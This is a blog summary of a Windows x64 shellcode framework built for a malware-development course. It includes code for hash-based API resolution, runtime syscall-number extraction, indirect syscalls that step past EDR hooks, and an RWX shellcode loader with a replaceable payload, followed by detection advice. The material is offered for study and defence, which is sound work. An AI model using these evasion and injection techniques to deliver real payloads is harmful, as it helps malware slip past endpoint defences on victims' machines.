tabby — A Minimal Position-Independent Windows x64 Shellcode Framework, Built Entirely on Linux

tabby — A Minimal Position-Independent Windows x64 Shellcode Framework, Built Entirely on Linux

Original text: cocomelonc/tabby README on GitHub — by cocomelonc. The screenshots are reproduced from the repository’s img/ folder; technical code snippets and the project-rationale table are reproduced verbatim with attribution. Prose summary is original.
tabby shellcode framework overview screenshot
tabby — a minimal position-independent Windows x64 shellcode framework. Source: original repository.

Executive Summary

tabby is cocomelonc’s minimal teaching framework for building position-independent Windows x64 shellcode in C, designed for the upcoming Malware Development for Ethical Hackers (2026) course. The pitch: write your payload as a normal sc_main(PVOID base) function in C, let a small entry stub, a PEB walker, an FNV-1a hash table and a stack-string macro handle PIC, base-address recovery, API resolution and shellcode-safe strings — and let an indirect NT syscall dispatcher hide the syscall behind ntdll’s own syscall; ret gadget. The output is a flat shellcode.bin with no PE header, no IAT, no CRT — ready to inject into any Windows x64 process. The whole project is small enough to read end-to-end in one sitting: roughly 500 lines of C plus 80 lines of NASM.

What makes tabby interesting compared to the existing landscape isn’t novelty — every individual technique it uses (RDIP base recovery, PEB+EAT walking, FNV-1a hashed exports, indirect syscalls past EDR hooks) is in the public literature. The interesting part is that everything is laid bare in a small, readable codebase, and the entire build pipeline runs on Linux: mingw-w64 + nasm + a custom linker script + objcopy. No MSVC, no Windows SDK, no Wine. That makes it usable as a study object — you can read the entry stub, the PEB walker, the stack-string macro and the syscall stubs side by side and understand exactly which detection problem each piece solves.

The Four Ideas Holding It Together

cocomelonc structures the README around four concepts that map one-to-one to the framework’s files:

  • Write shellcode in C, not assembly. The framework handles PIC, base-address recovery, API resolution, and syscall dispatch. The hand-written assembly is confined to a ~20-line entry stub and 3-instruction syscall stubs generated by a macro.
  • No PE header, no IAT, no CRT. The output is a flat .bin starting at byte 0 with _start at offset 0. There are no imports — every Windows API is resolved at runtime by FNV-1a hash via a PEB walk + EAT walk. There is no libc — the STACKSTR macro builds strings on the stack so they never appear in .rdata.
  • Indirect syscalls that look clean on the call stack. Instead of executing syscall ourselves (which leaves the shellcode as the return address — flagged by call-stack-aware EDRs), each stub jumps to the syscall; ret bytes already living inside ntdll’s own stub, past any EDR inline hook. The kernel sees a return address inside ntdll.
  • Linux-only toolchain. mingw-w64 + nasm + a custom linker script + objcopy. Zero Windows dependency to build.

Each component answers a specific detection problem:

  • entry.asm — how does shellcode find its own base address? (RDIP)
  • resolve.c — how do we call Windows APIs with no IAT? (PEB + EAT walk)
  • pic.h — how do we avoid string IOCs? (FNV-1a hashes + STACKSTR)
  • stubs.asm — how do we bypass EDR hooks on ntdll? (indirect syscalls)
  • syscall.c — how do we get SSNs without hardcoding them? (runtime extraction)
  • flat.ld — how do we produce raw bytes from a normal toolchain? (linker script + objcopy)

cocomelonc positions the project explicitly against the alternatives: code generators like SysWhispers hide these mechanics behind generation steps, and full C2 frameworks like Cobalt Strike are too big to study end-to-end. tabby is described as the minimum viable framework that makes each technique inspectable.

What It Is Not

Three sharp negatives from the README that are worth restating before anyone misreads the project:

  • Not a C2 or post-exploitation framework.
  • Not a packer or crypter for existing PE files.
  • Not a polished offensive tool. It is a teaching framework for the Malware Development for Ethical Hackers trainings. The README is structured around why each design decision was made — the project-structure rationale table is the spine of the documentation.

Core Concept 1 — Position-Independent Code

A normal Windows EXE assumes a fixed load address. The linker bakes absolute addresses for every function call, global variable and string literal into the binary. Move the code somewhere else in memory and those absolute addresses become garbage; the process crashes on the first dereference. Shellcode, by definition, must run no matter where it lands.

On x86-64 the basics are easier than on 32-bit because CALL rel32 and LEA reg, [rip+N] are already RIP-relative by design. The remaining problems are specific:

  • Strings and constants. The compiler normally places them in .rdata at a fixed address. tabby merges .rdata into .text via the linker script and uses STACKSTR to materialise strings on the stack at runtime.
  • Global variables. The SSN slots and the gadget pointer must live somewhere the stubs can find them via [rel label]. They live in .text too; the linker script discards .data and .bss.
  • _start at byte 0. The entry object is pinned first in the linker script so jumping to the first byte of shellcode.bin always lands in _start.

The entry stub (asm/entry.asm) uses the classic RDIP trick to recover its own load address:

  call  .here
.here:
  pop   rcx                     ; rcx = runtime address of .here
  sub   rcx, (.here - _start)   ; rcx = base of shellcode

This gives sc_main() a pointer to the shellcode’s own base, which is useful when you embed a secondary payload or config block after the code (the demo example/alloc_exec.c does exactly this).

Core Concept 2 — API Resolution Without Imports

A normal program calls Windows APIs through the Import Address Table. The PE loader fills the IAT for you by calling LoadLibrary and GetProcAddress. A flat shellcode blob has no IAT — you have to find APIs yourself.

The canonical mechanism is a walk of the Process Environment Block (PEB):

gs:[0x60]  ->  PEB
            └─ Ldr  ->  PEB_LDR_DATA
                        └─ InLoadOrderModuleList  (doubly-linked)
                            ├─ ntdll.dll
                            ├─ kernel32.dll
                            └─ ...

Every loaded DLL is in this list along with its base address and name. Once you have a module base, you walk its Export Address Table (EAT) — three parallel arrays of names, ordinals and function RVAs — to find a specific export.

Doing this by string comparison is noisy and leaves IOCs. tabby hashes the export names instead and compares those. The hash function is FNV-1a 32-bit — fast, well-distributed, trivial to implement without a CRT:

DWORD fnv1a(const char *s) {
  DWORD h = 0x811c9dc5;
  while (*s) { h ^= (BYTE)*s++; h *= 0x01000193; }
  return h;
}

Pre-computed hash constants live in include/ntapi.h. The tools/hash.py helper generates or verifies them:

$ python3 tools/hash.py NtAllocateVirtualMemory ntdll.dll
  NtAllocateVirtualMemory  ->  0xca67b978u
  ntdll.dll                ->  0xa62a3b3bu
FNV-1a hash output for NtAllocateVirtualMemory and ntdll.dll
Pre-computing FNV-1a hashes for a Win32 export and a DLL name via tools/hash.py. Source: original repository.

The DLL-name comparison is case-insensitive (the names are lowercased during the LDR walk). Export names are compared case-sensitive because the EAT preserves the original casing of each export.

Core Concept 3 — Indirect Syscalls

Calling something like NtAllocateVirtualMemory from shellcode via the normal ntdll export is caught by modern EDRs. The EDR installs an inline hook: it overwrites the first bytes of the ntdll stub with a JMP into its own code, inspects the call, and then either lets it proceed or blocks it.

Direct syscalls bypass the hook by setting up the system-call number (SSN) in EAX and executing syscall ourselves:

  mov  eax, 0x18       ; SSN for NtAllocateVirtualMemory
  mov  r10, rcx        ; NT ABI: r10 must mirror rcx
  syscall

This dodges the inline hook, but it creates a new problem: the thread call stack shows our_shellcode+N → NtAllocateVirtualMemory. Call-stack-aware EDRs flag any syscall whose return address isn’t inside ntdll.

Indirect syscalls fix this. Instead of executing syscall ourselves, we jump to the syscall; ret instruction pair that already exists inside ntdll’s own stub — past the EDR hook. Looking at ntdll!NtAllocateVirtualMemory:

ntdll!NtAllocateVirtualMemory:
  4C 8B D1        mov r10, rcx      <- hook overwrites here
  B8 18 00 00 00  mov eax, 0x18
  0F 05           syscall           <- we jump to here
  C3              ret

Now the return address the kernel sees is inside ntdll. The call stack looks clean.

The SSN itself is extracted at runtime by scanning the ntdll stub for the mov eax, imm32 byte pattern (0xB8). This works even on hooked stubs because hooks typically clobber only the first bytes (the mov r10, rcx prologue) and leave the mov eax sequence intact further down:

static DWORD extract_ssn(PBYTE stub) {
  for (int i = 0; i < 32; i++) {
    if (stub[i] == 0xB8) {
      DWORD ssn = *(DWORD *)(stub + i + 1);
      if (ssn < 0x600) return ssn;   // sanity: no NT SSN is >= 0x600
    }
  }
  return (DWORD)-1;
}

Core Concept 4 — The Linux-Only Toolchain

A Windows PE is compiled for Windows but the compilation itself is just C and assembly source going through a normal toolchain. mingw-w64 is a complete Win64 cross-compiler that runs on Linux and produces native Windows COFF objects and PE executables. The flat-binary extraction step uses objcopy to peel the .text section out of the PE wrapper. The pipeline as cocomelonc lays it out:

C source  ->  x86_64-w64-mingw32-gcc      ->  Win64 COFF .o
ASM       ->  nasm -f win64               ->  Win64 COFF .o
COFF .o   ->  x86_64-w64-mingw32-ld       ->  PE .elf  (single .text section)
PE .elf   ->  x86_64-w64-mingw32-objcopy  ->  shellcode.bin  (raw bytes)

Nothing in this pipeline touches Windows. The output runs on Windows because the machine code itself is Win64-ABI compliant.

Repository Layout

tabby/
├── include/
│   ├── types.h        windows types from scratch - no SDK, no CRT headers
│   ├── pic.h          FNV-1a hash, STACKSTR macro, GETAPI helper, module hashes
│   └── ntapi.h        NT function pointer types, sc_* declarations, hash constants
├── src/
│   ├── crt.c          sc_memcpy / sc_memset / sc_memcmp / sc_strlen
│   ├── resolve.c      find_module (PEB walk) + resolve_export (EAT walk) + find_syscall_gadget
│   └── syscall.c      SSN extraction + syscall_init()
├── asm/
│   ├── entry.asm      _start at byte 0: RDIP -> sc_main(base)
│   └── stubs.asm      SSN slots + g_syscall_gadget + indirect syscall stubs (8 NT functions)
├── ld/
│   └── flat.ld        linker script: flatten .text and .rdata$* into single .text at offset 0
├── example/
│   ├── exec.c         minimal demo: PEB walk -> kernel32 -> WinExec("calc.exe")
│   └── alloc_exec.c   full demo: syscall init -> NtAlloc -> NtWrite -> NtProtect RWX -> NtCreateThreadEx
└── tools/
    ├── hash.py        FNV-1a pre-computation for ntapi.h constants
    └── loader.c       minimal Win64 test loader: maps shellcode.bin and executes it

Building It

Install on Ubuntu / Debian:

sudo apt install mingw-w64 nasm binutils-mingw-w64-x86-64
Installing mingw-w64 + nasm via apt
Installing the toolchain. No MSVC, no Windows SDK, no Wine. Source: original repository.

Clone and build:

git clone https://github.com/cocomelonc/tabby
cd tabby
make

Expected output:

nasm -f win64 -I include/ asm/entry.asm -o obj/entry.o
nasm -f win64 -I include/ asm/stubs.asm -o obj/stubs.o
x86_64-w64-mingw32-gcc ... -c src/crt.c     -o obj/crt.o
x86_64-w64-mingw32-gcc ... -c src/resolve.c -o obj/resolve.o
x86_64-w64-mingw32-gcc ... -c src/syscall.c -o obj/syscall.o
x86_64-w64-mingw32-gcc ... -c example/alloc_exec.c -o obj/alloc_exec.o
x86_64-w64-mingw32-ld -T ld/flat.ld --gc-sections -o bin/shellcode.elf ...
x86_64-w64-mingw32-objcopy --only-section=.text -O binary ...
[=^..^=] shellcode.bin  1760 bytes
tabby build output showing shellcode.bin at 1760 bytes
Full-stack build output — shellcode.bin at 1760 bytes including the indirect-NT-syscall machinery. Source: original repository.

The single warning (section below image base) is expected because the linker script intentionally places .text at virtual address 0 so the flat binary starts at byte 0.

A smaller standalone test shellcode (PEB walk + WinExec only, no indirect NT syscalls) is also available:

make exec      # produces bin/exec.bin (~416 bytes)
Building the standalone exec.bin variant
The lean variant: PEB walk plus WinExec, ~416 bytes. Source: original repository.

Verifying the Output Bytes

Disassemble the first bytes on Linux to confirm _start is at offset 0:

ndisasm -b 64 bin/shellcode.bin | head -20

Expected:

00000000  53                push rbx
00000001  57                push rdi
00000002  56                push rsi
00000003  4883EC20          sub rsp,byte +0x20   ; shadow space, preserves 16-byte alignment
00000007  E800000000        call 0xc
0000000C  59                pop rcx              ; <- RDIP trick
0000000D  4883E90C          sub rcx,byte +0xc    ; rcx = base of shellcode
00000011  E8XXXXXXXX        call sc_main
...
0000001E  6690              xchg ax,ax           ; padding to 0x20
00000020  0000              ssn_NtAllocateVirtualMemory  (dd 0, populated at runtime)
00000024  0000              ssn_NtWriteVirtualMemory
...
00000040  0000              g_syscall_gadget (dq 0)
00000048  8B0500000000      mov eax,[rel ssn_NtAllocateVirtualMemory]  ; <- first syscall stub
ndisasm output showing _start at offset 0 with RDIP trick
ndisasm output — _start at offset 0, RDIP sequence at 0x07–0x0D, SSN slots in .text from 0x20, first syscall stub at 0x48. Source: original repository.

The RDIP sequence at 0x07–0x0D is the canonical PIC base-address recovery. The SSN slots and the gadget pointer live in .text at offsets 0x20–0x47 so they survive the objcopy --only-section=.text extraction and remain reachable via RIP-relative addressing at any load address. The first syscall stub starts at 0x48.

Running It on Windows

bin/shellcode.bin is a raw byte blob — not an executable. To run it on Windows you need a loader: a normal Win32 program that maps the blob into memory and jumps into it.

Build the loader

On Linux, cross-compile tools/loader.c with:

make loader

This produces bin/loader.exe via mingw-w64 — still no Windows required.

Cross-compiling tools/loader.c to loader.exe with mingw-w64
Cross-compiling loader.exe on Linux with x86_64-w64-mingw32-gcc. Source: original repository.

Deploy and run

Copy both files to the Windows machine and run:

.\loader.exe shellcode.bin
Running loader.exe shellcode.bin on Windows to pop calc.exe
shellcode.bin running on Windows — full indirect-NT-syscall pipeline pops calc.exe. Source: original repository.

Or, to test the smaller standalone shellcode first:

.\loader.exe exec.bin
Running loader.exe exec.bin to pop calc.exe via WinExec
exec.bin — the PEB-walk-only variant — calling WinExec("calc.exe") directly. Source: original repository.

Both pop calc.exe. The difference: exec.bin calls WinExec directly (PEB walk + EAT walk only) while shellcode.bin does the full indirect-NT-syscall injection pipeline (NtAllocateVirtualMemoryNtWriteVirtualMemoryNtProtectVirtualMemoryNtCreateThreadEx) using exec.bin’s bytes as the embedded payload. If exec.bin pops calc but shellcode.bin doesn’t, the bug is somewhere in the indirect-syscall path (SSN extraction, gadget address, stub calling convention, or NtCreateThreadEx arguments) — not in the framework basics.

What the loader does

fopen("shellcode.bin", "rb")          // reads the raw bytes
VirtualAlloc(NULL, sz, RW)            // allocates a private RW region
fread -> buf                           // copies shellcode in
VirtualProtect(buf, sz, RWX)          // flips the region to execute-read-write
CreateThread(buf)                     // spawns a thread at byte 0
WaitForSingleObject(thread, INFINITE) // waits for shellcode to return
VirtualFree + CloseHandle             // cleans up

The region is mapped RWX (not RX) because syscall_init() writes the extracted SSN values into the shellcode’s own .text section at runtime. Without write access the first store would #AV and the thread would die silently.

The loader prints the load address before jumping so you can attach a debugger at the right offset:

[=^..^=] loaded 1760 bytes from shellcode.bin
[=^..^=] executing at 0x000001A2B3C40000

The bundled example payload (example/alloc_exec.c) spawns calc.exe via the following sequence:

  1. Allocate a fresh RW region via NtAllocateVirtualMemory (indirect syscall).
  2. Write an embedded mini-shellcode (PAYLOAD[] = example/exec.c compiled: PEB walk → WinExec("calc.exe")).
  3. Flip the region to RWX via NtProtectVirtualMemory.
  4. Spawn a thread on it via NtCreateThreadEx.
  5. Wait for the thread, close the handle, free the region.

Swap PAYLOAD[] with any position-independent x64 shellcode and rebuild with make.

Writing Your Own Shellcode

  1. Copy example/alloc_exec.c or example/exec.c as a starting template, or create a new file in example/.
  2. Write a sc_main(PVOID base) function. If you call any sc_Nt* stub, call syscall_init(ntdll) first. base is the runtime address of byte 0 of your shellcode — useful if you embed config or a secondary payload after the code.
  3. Add a build rule for your .c file in Makefile and list its .o in C_OBJS (or replace alloc_exec.o).
  4. Run make (or make exec for a variant that excludes the syscall stubs entirely).

Using the PEB resolver

PVOID ntdll    = find_module(H_NTDLL);
PVOID kernel32 = find_module(H_KERNEL32);

To resolve any export by name:

typedef HANDLE (*GetStdHandle_t)(DWORD);
GetStdHandle_t pGetStdHandle = (GetStdHandle_t) resolve_export(kernel32, H_GetStdHandle);

Or with the GETAPI macro:

HANDLE h = GETAPI(H_KERNEL32, H_GetStdHandle, GetStdHandle_t)(STD_OUTPUT_HANDLE);

Using the indirect syscalls

After syscall_init(ntdll), call the sc_Nt* functions exactly like the real NT API:

PVOID  region = NULL;
SIZE_T size   = 4096;

NTSTATUS st = sc_NtAllocateVirtualMemory(
    (HANDLE)-1,               // current process 
    &region,
    0,
    &size,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE);

if (!NT_SUCCESS(st)) { // handle error }

The set of pre-defined stubs:

functionargsnotes
sc_NtAllocateVirtualMemory6allocate memory in a process
sc_NtWriteVirtualMemory5write across process boundary
sc_NtProtectVirtualMemory5change page protection
sc_NtFreeVirtualMemory4release allocation
sc_NtCreateThreadEx11spawn thread in local or remote process
sc_NtWaitForSingleObject3wait on a handle
sc_NtClose1close a handle
sc_NtTerminateProcess2terminate a process
Pre-defined indirect-syscall stubs shipped with tabby. Source: original repository.

Strings — never in .rdata

Don’t write:

const char *msg = "hello";   // ends up in .rdata -> fixed address -> crash

Use STACKSTR instead:

STACKSTR(msg, "hello");      // pushed onto the stack character by character

Adding a new NT syscall stub

Step 1. Add the SSN slot and stub to asm/stubs.asm (slot lives in .text, not .bss, so it survives flat-binary extraction):

global ssn_NtOpenProcess
ssn_NtOpenProcess: dd 0

STUB NtOpenProcess, ssn_NtOpenProcess

The STUB macro emits a single, ABI-clean stub — no argument shifting needed for any number of arguments because the Win64 calling convention already places args 5+ at [rsp+28h], exactly where the kernel reads them.

Step 2. Declare the SSN extern and add the LOAD_SSN call inside src/syscall.c:

extern DWORD ssn_NtOpenProcess;
...
LOAD_SSN(ssn_NtOpenProcess, H_NtOpenProcess);

Step 3. Add the hash constant to include/ntapi.h:

#define H_NtOpenProcess  0xXXXXXXXXu

Compute it:

python3 tools/hash.py NtOpenProcess
tools/hash.py output for adding a new NT syscall stub
Generating the FNV-1a hash constant for a new NT export. Source: original repository.

Step 4. Declare the prototype in include/ntapi.h:

NTSTATUS sc_NtOpenProcess(HANDLE *, DWORD, OBJECT_ATTRIBUTES *, CLIENT_ID *);

How Indirect Syscall Dispatch Works, Step by Step

Take sc_NtAllocateVirtualMemory as the example. The C caller looks like:

sc_NtAllocateVirtualMemory((HANDLE)-1, &region, 0, &size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);

The Win64 calling convention maps this to:

RCX  = (HANDLE)-1
RDX  = &region
R8   = 0
R9   = &size
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE    <- 5th arg on stack
[RSP+0x30] = PAGE_READWRITE            <- 6th arg on stack

The stub itself is three instructions:

sc_NtAllocateVirtualMemory:
    mov  eax, dword [rel ssn_NtAllocateVirtualMemory]  ; EAX <- SSN
    mov  r10, rcx                                       ; R10 <- RCX  (NT ABI)
    jmp  qword [rel g_syscall_gadget]

The stub doesn’t touch the stack, doesn’t shift arguments, doesn’t modify RSP. The Win64 calling convention already places args 5+ at [rsp+28h], [rsp+30h], and the kernel reads them from those offsets after syscall. Nothing extra is needed. At the point of JMP, the register/stack state is:

EAX  = SSN
R10  = (HANDLE)-1                    <- arg 1 (kernel reads R10, not RCX, after syscall)
RDX  = &region                       <- arg 2
R8   = 0                             <- arg 3
R9   = &size                         <- arg 4
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE  <- arg 5
[RSP+0x30] = PAGE_READWRITE          <- arg 6

The JMP lands on the syscall; ret bytes inside ntdll’s own NtAllocateVirtualMemory stub — past any EDR hook. The kernel runs the syscall and rets back to the call site inside ntdll. The call stack the kernel (and any call-stack scanner) observes has a return address inside ntdll — not inside our shellcode.

Replacing the Payload

The example/alloc_exec.c demo ships with the compiled bytes of example/exec.c as PAYLOAD[]. To use your own:

static const BYTE PAYLOAD[] = {
  // paste your x64 shellcode bytes here
  0x48, 0x31, 0xc0, ...
};

Regenerate the bytes from a fresh make exec build:

make exec
python3 -c "
data = open('bin/exec.bin','rb').read()
for i in range(0, len(data), 12):
    print('  ' + ', '.join(f'0x{b:02x}' for b in data[i:i+12]) + ',')
"

Or generate shellcode with any external framework (msfvenom, donut, your own) and paste the byte array. The framework handles allocation, write, protection flip and thread creation — you only need to provide the bytes.

The Project-Structure Rationale Table

This is the table at the heart of the README. It is a list of every compiler flag, linker option and design decision in tabby, each with the precise reason it’s there. It is reproduced verbatim because the reasoning is the entire point of the project as a teaching artifact.

decisionreason
-nostdlib -nostdinc -ffreestandingzero CRT dependency; everything in the binary came from our own source
-fno-builtinprevents GCC emitting implicit memcpy/memset calls to CRT
-mno-red-zoneWin64 does not honour the System V red zone; without this, signal delivery or asynchronous callbacks can corrupt our stack frame
-mcmodel=smallcritical: forces direct IMAGE_REL_AMD64_REL32 relocations for global symbol access. without it, mingw64 emits .refptr.<sym> indirection through .rdata that holds the absolute link-time VMA. for our flat binary with . = 0 that VMA is meaningless at runtime; every SSN store would crash with #AV
-fno-asynchronous-unwind-tablessuppresses .eh_frame generation; we discard it anyway but this avoids linker noise
-ffunction-sections -fdata-sections + ld --gc-sectionsdead-code elimination: drops unused symbols (e.g. sc_memcpy if no STACKSTR is large enough to need it) so the binary contains only what’s actually called
-Ossize optimisation keeps shellcode small; also discourages the compiler from emitting CRT helper calls
nasm -f win64produces Win64 COFF objects compatible with mingw-w64-ld; full access to NASM macros for clean stub generation
SSN slots in .text (via NASM dd 0)mingw64 places C globals in .bss, which our linker script discards. defining the slots in NASM’s .text section guarantees they survive objcopy --only-section=.text and the stubs’ [rel ssn_*] displacements resolve correctly
linker script at . = 0 + .rdata$* .text$* merged into .textlets objcopy --only-section=.text produce a flat binary starting at offset 0 with no PE overhead; the $* wildcards catch COFF section groups emitted by -ffunction-sections/-fdata-sections
entry stub sub rsp, 0x20 (not 0x28)after push rbx/rdi/rsi the stack is already 16-aligned. sub rsp, 0x20 (32, a multiple of 16) preserves alignment so sc_main receives the Win64-ABI-correct RSP mod 16 = 8. otherwise MOVAPS inside any Windows DLL (e.g. CreateProcess inside WinExec) raises #AC and the thread dies silently
FNV-1a over CRC32equally fast, no special instructions required, fits in 6 lines of C
per-function SSN slotsavoids a generic do_syscall(ssn, ...) wrapper that would need to shift a variable number of stack arguments; each stub has the exact Win64 signature the kernel expects
Compiler-flag and design-decision rationale for tabby. Source: original repository README.

Key Takeaways

  • Every technique tabby uses has been seen before. The contribution is the small, readable surface area: ~500 lines of C plus ~80 lines of NASM, with a one-paragraph rationale for every non-obvious choice. It’s built explicitly as a teaching artifact for the Malware Development for Ethical Hackers course.
  • Linux-only toolchain matters more than it sounds. mingw-w64 + nasm + a custom linker script + objcopy means no Windows / MSVC / Wine in the build pipeline — it also means CI for malware-research courses can run on stock Linux runners without complex VM orchestration.
  • Indirect syscalls are the headline EDR-evasion technique on display. Jumping to ntdll’s own syscall; ret defeats both inline-hook detection and call-stack-aware detectors that flag syscalls returning into non-ntdll memory.
  • SSNs are extracted at runtime, not hard-coded. Scanning the ntdll stub for the 0xB8 (mov eax, imm32) byte pattern means the same shellcode works across Windows builds even as Microsoft reshuffles syscall numbers.
  • FNV-1a + STACKSTR eliminate plaintext IOCs. No DLL or function names in .rdata, no plaintext payload strings — everything is either hashed at compile time or pushed onto the stack at runtime.
  • The flat-binary trick is mostly the linker script. The . = 0 placement, the .rdata$* .text$* wildcard merge into a single .text, and the explicit discard of .data/.bss together let objcopy --only-section=.text produce a byte-zero-aligned blob with no PE overhead.
  • The -mcmodel=small flag is load-bearing. The README explicitly calls this out: without it, mingw-w64 introduces .refptr.<sym> indirection that breaks at VMA = 0. Anyone reproducing this trick on their own toolchain must keep this flag.

Defensive Recommendations

  • Don’t rely on inline-hook detection alone. Indirect-syscall frameworks like tabby render ntdll inline hooks useless — the hooked bytes are stepped over because the shellcode jumps directly to the post-hook syscall; ret. Pair user-mode hooks with kernel-level telemetry (PsSetCreateThreadNotifyRoutineEx, ETW Threat Intelligence, syscall provenance) to catch the actual syscall regardless of how the call site reached it.
  • Hunt for call-stack provenance, not just call-stack-inside-ntdll. Indirect syscalls leave the kernel-visible return address inside ntdll, but the stack frame below that is still attacker-controlled memory. Detection rules that walk the call stack and check whether the parent frame is mapped to a backed PE file (rather than an RX/RWX private allocation) will surface tabby-style payloads. Pavel Yosifovich’s and ETW Threat Intelligence based detectors do this; build it into your EDR if it isn’t there.
  • RWX private allocations from non-PE code are still the high-signal IOC. The bundled loader maps the shellcode RWX because the syscall stubs write SSNs into their own .text at runtime. Any modern EDR should treat the creation of an RWX private allocation that subsequently hosts an executing thread (via CreateThread on the allocation base) as a near-certain malicious pattern outside of very narrow benign exceptions (JIT compilers in known processes).
  • Audit ETW Threat Intelligence event volume. EDRs that consume ETW-TI get a syscall-level view that bypasses user-mode hooks entirely. If your stack disables ETW-TI (some performance-tuned deployments do) you are blind to exactly this class of attack.
  • Block VirtualProtect/NtProtectVirtualMemory transitions from RW to RX/RWX on private allocations from low-trust contexts via WDAC/AppLocker policies and EDR rules. The loader’s explicit RW → RWX flip is one of the single highest-signal events you can hook.
  • Treat unique FNV-1a / DJB2 / similar hash constants as YARA signal. 0xca67b978 (the FNV-1a hash of NtAllocateVirtualMemory) is a fingerprint of this exact tooling pattern. Build YARA rules that flag the simultaneous presence of FNV-1a constants in non-trivial binaries.
  • Process memory scanning that walks executable allocations and looks for missing PE headers at the start of the allocation is a high-confidence detector for flat-shellcode loaders. tabby’s shellcode.bin is byte-for-byte recognizable as not a PE because it begins with the entry stub at offset 0.
  • Educational frameworks like this are a defender’s gift. Read tabby end-to-end as a study of where modern offensive tooling actually puts its evasion. The same mechanics are present in commercial C2 frameworks at far greater scale; reading the minimal version helps your detection engineers reason about the full implementation.

Conclusion

tabby is interesting because it is small. Every line of code has a reason in the README, the entire build runs on Linux, and the four canonical evasion techniques — position-independent code, IAT-less API resolution, indirect NT syscalls past EDR hooks, and runtime SSN extraction — are laid out in roughly 500 lines of C and 80 of NASM. It is a teaching artifact, not a weapon, and the author calls that out explicitly. For defenders, it is a clean reference of exactly what they should expect to see in modern malware that does its job well, and exactly which detection patterns survive when the obvious ones (inline-hook detection, ntdll call-stack heuristics) don’t. The full source is on GitHub at cocomelonc/tabby.

Original text: cocomelonc/tabby on GitHub by cocomelonc. This tool is a proof of concept for educational purposes only; the original author takes no responsibility for any damage caused by misuse.

Comments are closed.